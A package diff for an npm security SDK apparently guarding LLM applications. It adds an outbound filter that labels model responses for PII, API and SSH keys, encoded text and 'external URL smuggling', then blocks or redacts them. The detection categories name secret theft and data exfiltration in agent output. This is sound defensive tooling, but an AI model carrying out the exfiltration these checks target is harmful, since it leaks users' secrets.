@sandrobuilds/tracerney 0.9.22 → 0.9.24

package/README.md

@@ -184,6 +184,47 @@ The verify-prompt endpoint returns structured responses. Success (HTTP 200) incl
 
 ---
 
+## Outbound Response Filtering: `validate()`
+
+Layer 1 also runs on every LLM **response** before it reaches your user — scanning for PII, secrets, and active exfiltration attempts embedded in agent output.
+
+The SDK is a high-precision sensor. It never decides for you. It labels every finding and hands you the keys:
+
+```typescript
+const trace = tracerney.validate(agentOutput);
+
+if (trace.isSuspicious) {
+  console.log(`[${trace.label}]: ${trace.reason}`);
+
+  // Option A: Hard block
+  if (trace.label === 'SUSPICIOUS_EGRESS') {
+    throw new Error('Security Policy Violation');
+  }
+
+  // Option B: Surgical scrub
+  return trace.redactedContent;
+}
+```
+
+```typescript
+trace.isSuspicious      // boolean — true if any pattern matched
+trace.label             // see manifest below
+trace.reason            // "Detected 2 finding(s): Email Address, AWS Access Key ID"
+trace.redactedContent   // pre-scrubbed version — use it or throw, your call
+trace.findings          // full per-pattern breakdown for logging/telemetry
+```
+
+### The Suspicious Manifest
+
+| Trigger | Label | Recommended action |
+|---|---|---|
+| Email / Phone | `SUSPICIOUS_PII` | Usually Redact |
+| API Keys / SSH / CC / SSN | `SUSPICIOUS_SECRET` | Usually Block |
+| External URL smuggling | `SUSPICIOUS_EGRESS` | Always Block |
+| Zero-width / BiDi / Base64 | `SUSPICIOUS_ENCODING` | Audit / Block |
+
+---
+
 ## Pricing & Usage
 
 - **Free Tier:** 50 scans/month with Layer 1 pattern detection

package/dist/application/ShieldApplicationService.d.ts

@@ -3,6 +3,7 @@
  * Core orchestrator: wires domain services + infrastructure adapters
  * Fixes all 5 integration gaps from the original design
  */
+import { type SuspiciousTrace } from "../domain/pii/DeterministicFilter";
 import { type ToolPolicy } from "../domain/guard/ToolPolicy";
 import { ILLMProvider, type LLMResponse } from "./ports/ILLMProvider";
 import { ISentinel } from "./ports/ISentinel";
@@ -30,6 +31,7 @@ export interface ScanResult {
     severity?: string;
     blocked: boolean;
 }
+export type { SuspiciousTrace };
 export interface ServiceStatus {
     patternMatcher: {
         ready: boolean;
@@ -46,6 +48,7 @@ export interface ServiceStatus {
 export declare class ShieldApplicationService {
     private readonly config;
     private patternMatcher;
+    private readonly deterministicFilter;
     private toolGuard;
     private telemetrySink?;
     private llmProvider?;
@@ -76,6 +79,11 @@ export declare class ShieldApplicationService {
      * - Jitter: Add random delay to obfuscate timing
      */
     scanPrompt(prompt: string, requestId?: string): Promise<ScanResult>;
+    /**
+     * Layer 1: Scan any string for suspicious content.
+     * Returns a SuspiciousTrace — the SDK never decides for you.
+     */
+    validate(text: string): SuspiciousTrace;
     /**
      * Update tool policy at runtime
      */

package/dist/application/ShieldApplicationService.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"ShieldApplicationService.d.ts","sourceRoot":"","sources":["../../src/application/ShieldApplicationService.ts"],"names":[],"mappings":"AAAA;;;;GAIG;AAIH,OAAO,EAAoB,KAAK,UAAU,EAAE,MAAM,4BAA4B,CAAC;AAO/E,OAAO,EAAE,YAAY,EAAE,KAAK,WAAW,EAAE,MAAM,sBAAsB,CAAC;AACtE,OAAO,EAAE,SAAS,EAAE,MAAM,mBAAmB,CAAC;AAC9C,OAAO,EAAE,cAAc,EAAE,MAAM,wBAAwB,CAAC;AACxD,OAAO,EAAE,kBAAkB,EAAE,MAAM,4BAA4B,CAAC;AAGhE,OAAO,EAAE,iBAAiB,EAAyB,MAAM,6BAA6B,CAAC;AAIvF,MAAM,WAAW,8BAA8B;IAC7C,iBAAiB,EAAE,kBAAkB,CAAC;IACtC,aAAa,CAAC,EAAE,cAAc,CAAC;IAC/B,UAAU,EAAE,UAAU,CAAC;IACvB,UAAU,CAAC,EAAE,MAAM,CAAC;IACpB,WAAW,CAAC,EAAE,YAAY,CAAC;IAC3B,QAAQ,CAAC,EAAE,SAAS,CAAC;IACrB,aAAa,CAAC,EAAE,iBAAiB,CAAC;CACnC;AAED,MAAM,WAAW,WAAW;IAC1B,MAAM,CAAC,EAAE,MAAM,CAAC;IAChB,SAAS,CAAC,EAAE,MAAM,CAAC;IACnB,SAAS,CAAC,EAAE,MAAM,CAAC;IACnB,QAAQ,CAAC,EAAE,MAAM,CAAC;CACnB;AAED,MAAM,WAAW,UAAU;IACzB,UAAU,EAAE,OAAO,CAAC;IACpB,WAAW,CAAC,EAAE,MAAM,CAAC;IACrB,QAAQ,CAAC,EAAE,MAAM,CAAC;IAClB,OAAO,EAAE,OAAO,CAAC;CAClB;AAED,MAAM,WAAW,aAAa;IAC5B,cAAc,EAAE;QACd,KAAK,EAAE,OAAO,CAAC;QACf,KAAK,CAAC,EAAE,OAAO,CAAC;KACjB,CAAC;IACF,SAAS,EAAE;QACT,YAAY,EAAE,SAAS,MAAM,EAAE,CAAC;KACjC,CAAC;IACF,SAAS,EAAE;QACT,OAAO,EAAE,OAAO,CAAC;QACjB,MAAM,CAAC,EAAE,OAAO,CAAC;KAClB,CAAC;CACH;AAED,qBAAa,wBAAwB;IASvB,OAAO,CAAC,QAAQ,CAAC,MAAM;IARnC,OAAO,CAAC,cAAc,CAAiB;IACvC,OAAO,CAAC,SAAS,CAAY;IAC7B,OAAO,CAAC,aAAa,CAAC,CAAiB;IACvC,OAAO,CAAC,WAAW,CAAC,CAAe;IACnC,OAAO,CAAC,QAAQ,CAAC,CAAY;IAE7B,OAAO,CAAC,QAAQ,CAAC,UAAU,CAAS;gBAEP,MAAM,EAAE,8BAA8B;IAenE;;;OAGG;IACH,OAAO,CAAC,oBAAoB;IAmB5B;;;;;;OAMG;IACG,IAAI,CAAC,CAAC,SAAS,WAAW,EAC9B,OAAO,EAAE,MAAM,OAAO,CAAC,CAAC,CAAC,EACzB,OAAO,CAAC,EAAE,WAAW,GACpB,OAAO,CAAC,CAAC,CAAC;IAuDb;;;;;;;;;OASG;IACG,UAAU,CAAC,MAAM,EAAE,MAAM,EAAE,SAAS,CAAC,EAAE,MAAM,GAAG,OAAO,CAAC,UAAU,CAAC;IAmFzE;;OAEG;IACH,eAAe,CAAC,KAAK,EAAE,SAAS,MAAM,EAAE,GAAG,IAAI;IAK/C;;OAEG;IACH,SAAS,IAAI,aAAa;IAgB1B;;OAEG;IACH,OAAO,CAAC,MAAM;IAMd;;OAEG;IACH,OAAO,IAAI,IAAI;IAIf;;OAEG;IACH,OAAO,CAAC,iBAAiB;CAG1B"}
+{"version":3,"file":"ShieldApplicationService.d.ts","sourceRoot":"","sources":["../../src/application/ShieldApplicationService.ts"],"names":[],"mappings":"AAAA;;;;GAIG;AAGH,OAAO,EAAuB,KAAK,eAAe,EAAsB,MAAM,mCAAmC,CAAC;AAElH,OAAO,EAAoB,KAAK,UAAU,EAAE,MAAM,4BAA4B,CAAC;AAO/E,OAAO,EAAE,YAAY,EAAE,KAAK,WAAW,EAAE,MAAM,sBAAsB,CAAC;AACtE,OAAO,EAAE,SAAS,EAAE,MAAM,mBAAmB,CAAC;AAC9C,OAAO,EAAE,cAAc,EAAE,MAAM,wBAAwB,CAAC;AACxD,OAAO,EAAE,kBAAkB,EAAE,MAAM,4BAA4B,CAAC;AAGhE,OAAO,EAAE,iBAAiB,EAAyB,MAAM,6BAA6B,CAAC;AAIvF,MAAM,WAAW,8BAA8B;IAC7C,iBAAiB,EAAE,kBAAkB,CAAC;IACtC,aAAa,CAAC,EAAE,cAAc,CAAC;IAC/B,UAAU,EAAE,UAAU,CAAC;IACvB,UAAU,CAAC,EAAE,MAAM,CAAC;IACpB,WAAW,CAAC,EAAE,YAAY,CAAC;IAC3B,QAAQ,CAAC,EAAE,SAAS,CAAC;IACrB,aAAa,CAAC,EAAE,iBAAiB,CAAC;CACnC;AAED,MAAM,WAAW,WAAW;IAC1B,MAAM,CAAC,EAAE,MAAM,CAAC;IAChB,SAAS,CAAC,EAAE,MAAM,CAAC;IACnB,SAAS,CAAC,EAAE,MAAM,CAAC;IACnB,QAAQ,CAAC,EAAE,MAAM,CAAC;CACnB;AAED,MAAM,WAAW,UAAU;IACzB,UAAU,EAAE,OAAO,CAAC;IACpB,WAAW,CAAC,EAAE,MAAM,CAAC;IACrB,QAAQ,CAAC,EAAE,MAAM,CAAC;IAClB,OAAO,EAAE,OAAO,CAAC;CAClB;AAED,YAAY,EAAE,eAAe,EAAE,CAAC;AAEhC,MAAM,WAAW,aAAa;IAC5B,cAAc,EAAE;QACd,KAAK,EAAE,OAAO,CAAC;QACf,KAAK,CAAC,EAAE,OAAO,CAAC;KACjB,CAAC;IACF,SAAS,EAAE;QACT,YAAY,EAAE,SAAS,MAAM,EAAE,CAAC;KACjC,CAAC;IACF,SAAS,EAAE;QACT,OAAO,EAAE,OAAO,CAAC;QACjB,MAAM,CAAC,EAAE,OAAO,CAAC;KAClB,CAAC;CACH;AAED,qBAAa,wBAAwB;IAUvB,OAAO,CAAC,QAAQ,CAAC,MAAM;IATnC,OAAO,CAAC,cAAc,CAAiB;IACvC,OAAO,CAAC,QAAQ,CAAC,mBAAmB,CAAsB;IAC1D,OAAO,CAAC,SAAS,CAAY;IAC7B,OAAO,CAAC,aAAa,CAAC,CAAiB;IACvC,OAAO,CAAC,WAAW,CAAC,CAAe;IACnC,OAAO,CAAC,QAAQ,CAAC,CAAY;IAE7B,OAAO,CAAC,QAAQ,CAAC,UAAU,CAAS;gBAEP,MAAM,EAAE,8BAA8B;IAkBnE;;;OAGG;IACH,OAAO,CAAC,oBAAoB;IAmB5B;;;;;;OAMG;IACG,IAAI,CAAC,CAAC,SAAS,WAAW,EAC9B,OAAO,EAAE,MAAM,OAAO,CAAC,CAAC,CAAC,EACzB,OAAO,CAAC,EAAE,WAAW,GACpB,OAAO,CAAC,CAAC,CAAC;IA6Gb;;;;;;;;;OASG;IACG,UAAU,CAAC,MAAM,EAAE,MAAM,EAAE,SAAS,CAAC,EAAE,MAAM,GAAG,OAAO,CAAC,UAAU,CAAC;IAmFzE;;;OAGG;IACH,QAAQ,CAAC,IAAI,EAAE,MAAM,GAAG,eAAe;IAIvC;;OAEG;IACH,eAAe,CAAC,KAAK,EAAE,SAAS,MAAM,EAAE,GAAG,IAAI;IAK/C;;OAEG;IACH,SAAS,IAAI,aAAa;IAgB1B;;OAEG;IACH,OAAO,CAAC,MAAM;IAMd;;OAEG;IACH,OAAO,IAAI,IAAI;IAIf;;OAEG;IACH,OAAO,CAAC,iBAAiB;CAG1B"}

package/dist/application/ShieldApplicationService.js

@@ -4,6 +4,7 @@
  * Fixes all 5 integration gaps from the original design
  */
 import { PatternMatcher } from '../domain/detection/PatternMatcher.js';
+import { DeterministicFilter } from '../domain/pii/DeterministicFilter.js';
 import { ToolGuard } from '../domain/guard/ToolGuard.js';
 import { createToolPolicy } from '../domain/guard/ToolPolicy.js';
 import { createSecurityEvent, SecurityEventType, ThreatSeverity, } from '../domain/events/index.js';
@@ -20,6 +21,8 @@ export class ShieldApplicationService {
         this.sentinel = config.sentinel; // Layer 2
         // this.shadowLogSink = config.shadowLogSink; // Disabled for now
         this.sdkVersion = config.sdkVersion ?? "0.2.0";
+        // Layer 1: deterministic outbound filter (singleton, stateless)
+        this.deterministicFilter = new DeterministicFilter();
         // Initialize patterns synchronously (bundled patterns always available)
         this.patternMatcher = new PatternMatcher(BUNDLED_PATTERNS);
         // Load remote patterns in background if configured (zero-day updates)
@@ -63,9 +66,45 @@ export class ShieldApplicationService {
                 // Layer 1 just marks suspicious=true, doesn't block
             }
             // Execute the LLM call
-            const response = await llmCall();
-            // FIX GAP 2: Compute and store latencyMs in event metadata
+            const rawResponse = await llmCall();
+            // ── Layer 1 (Outbound): Deterministic Filter ─────────────────────────
+            // Synchronous regex pass — <5ms, runs before the caller ever sees the text.
+            //
+            // The filter is a SENSOR, not a policy enforcer.
+            // It labels every finding with a SuspiciousLabel and pre-computes redactedContent.
+            // ShieldApplicationService acts on the label:
+            //
+            //   SUSPICIOUS_EGRESS   → throw (active exfiltration, caller gets nothing)
+            //   SUSPICIOUS_SECRET   → emit PII_LEAK alert, return redacted response
+            //   SUSPICIOUS_ENCODING → emit PII_LEAK alert, return redacted response
+            //   SUSPICIOUS_PII      → return redacted response silently
+            const { response, outcome: filterOutcome } = this.deterministicFilter.filterResponse(rawResponse);
             const latencyMs = Date.now() - startTime;
+            const trace = filterOutcome.trace;
+            if (trace.isSuspicious && trace.label) {
+                if (trace.label === "SUSPICIOUS_EGRESS") {
+                    // Active exfiltration — kill the process, caller gets nothing.
+                    const event = createSecurityEvent(requestId, SecurityEventType.SUSPICIOUS_EGRESS, ThreatSeverity.CRITICAL, `Layer 1: ${trace.reason}`, {
+                        patternName: trace.findings[0]?.patternName,
+                        blockLatencyMs: latencyMs,
+                        modelName: options?.modelName,
+                        provider: options?.provider,
+                    }, startTime);
+                    this.report(event);
+                    throw new ShieldBlockError("Tracerney Block: Suspicious Egress Detected", event);
+                }
+                if (trace.label === "SUSPICIOUS_SECRET" || trace.label === "SUSPICIOUS_ENCODING") {
+                    // Accidental leak of high-value data — alert, but return the scrubbed response.
+                    const event = createSecurityEvent(requestId, SecurityEventType.PII_LEAK, ThreatSeverity.HIGH, `Layer 1: ${trace.reason}`, {
+                        patternName: trace.findings[0]?.patternName,
+                        blockLatencyMs: latencyMs,
+                        modelName: options?.modelName,
+                        provider: options?.provider,
+                    }, startTime);
+                    this.report(event);
+                }
+                // SUSPICIOUS_PII (email/phone) → return scrubbed response silently, no event.
+            }
             // Validate tool calls against policy
             const toolCalls = response.choices?.[0]?.message?.tool_calls;
             const violation = this.toolGuard.validate(toolCalls, requestId);
@@ -171,6 +210,13 @@ export class ShieldApplicationService {
             await jitter();
         }
     }
+    /**
+     * Layer 1: Scan any string for suspicious content.
+     * Returns a SuspiciousTrace — the SDK never decides for you.
+     */
+    validate(text) {
+        return this.deterministicFilter.validate(text);
+    }
     /**
      * Update tool policy at runtime
      */

package/dist/application/ShieldApplicationService.js.map

@@ -1 +1 @@
-{"version":3,"file":"ShieldApplicationService.js","sourceRoot":"","sources":["../../src/application/ShieldApplicationService.ts"],"names":[],"mappings":"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"}
+{"version":3,"file":"ShieldApplicationService.js","sourceRoot":"","sources":["../../src/application/ShieldApplicationService.ts"],"names":[],"mappings":"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